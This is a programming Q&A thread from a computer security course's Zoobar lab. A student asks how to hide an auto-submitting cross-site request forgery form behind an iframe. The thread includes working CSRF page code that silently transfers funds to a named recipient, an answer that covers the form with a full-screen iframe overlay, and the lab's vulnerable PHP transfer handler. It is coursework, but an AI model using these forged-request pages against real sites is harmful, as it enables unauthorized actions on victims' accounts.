# How to submit a form invisibly with the help of iframe

Tags: javascript, php, html, iframe

This is a question regarding a course in computer security I am taking.

I have the following WORKING HTML document that simply submits a form for me:

```
<form method="POST" name="transferform"
  action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se")
</script>
```

Now I want to hide the form behind an iframe. I have followed other solutions on the internet to come up with this:

```
<iframe src = "http://www.kth.se">
<form method="POST" name="transferform"
  action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>

<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se");
</script>
</iframe>
```

and this:

```
<iframe src = "http://www.kth.se">
<form method="POST" name="transferform"
  action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>
</iframe>
<script>
document.getElementsByName("submission")[0].click();
</script>
```

, the only difference between them being the location of the closing iframe tag.

My problem is, when I open the document with a browser (that supports iframes), I see the iframe, but I don't get the effect I want from submitting the form with the `document.getElementsByName("submission")[0].click();` line. The submission is handled by the website in the transfer.php file, the relevant part of it being:

```
<?php 
  require_once("includes/common.php"); 
  nav_start_outer("Transfer");
  nav_start_inner();
  if($_POST['submission']) {
    $recipient = $_POST['recipient'];
    $zoobars = (int) $_POST['zoobars'];
    $sql = "SELECT Zoobars FROM Person WHERE Username='" .
           addslashes($user->username) . "'";
    $rs = $db->executeQuery($sql);
    $sender_balance = $rs->getValueByNr(0,0) - $zoobars;

    $sql = "SELECT Username, Zoobars FROM Person WHERE Username='" .
       addslashes($recipient) . "'";
    $rs = $db->executeQuery($sql);
    $recipient_exists = $rs->getValueByNr(0,0);
    if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
      $sql = "UPDATE Person SET Zoobars = $sender_balance " .
             "WHERE Username='" . addslashes($user->username) . "'";
      $db->executeQuery($sql);
      $sql = "SELECT Zoobars FROM Person WHERE Username='".
             addslashes($recipient) . "'";
      $rs = $db->executeQuery($sql);
      $recipient_balance = $rs->getValueByNr(0,0) + $zoobars;
      $sql = "UPDATE Person SET Zoobars = $recipient_balance " .
             "WHERE Username='" . addslashes($recipient) . "'";
      $db->executeQuery($sql);
      $result = "Sent $zoobars zoobars";
    }
    else $result = "Transfer to $recipient failed.";
  }
?>
```

As I know for a fact that the HTML document I have crafted works without the iframe, I believe that the execution of the script is somehow hindered or altered by the iframe. Does anyone know if this is true? If not, what is the reason for this altered or non-functionality?

Answer (score 0):

You want to hide the form behind an iframe, if I got you right.

So

```
    <form method="POST" name="transferform"
  action="http://dasak.csc.kth.se/zoobar/transfer.php">
<p>Send <input name="zoobars" type=text value="1" size=5> </p>
<p>to <input name="recipient" type=text value="sahand" size=10></p>
<input type=submit name="submission" value="Send">
</form>

<iframe style="background-color:grey;display:block;position:fixed;top:0px;left:0px;right:0px;bottom:0px;z-index:9999"></iframe>

<script>
document.getElementsByName("submission")[0].click();
location.replace("http://dasak.csc.kth.se")
</script>
```

Result: https://jsfiddle.net/ccj27ojf/

Comment: Hello, thanks for your response! I have tried this, and the problem is that I get redirected to the ´http://dasak.csc.kth.se/zoobar/transfer.php´ page after the form is submitted. This is not desirable, is there any way to prevent it?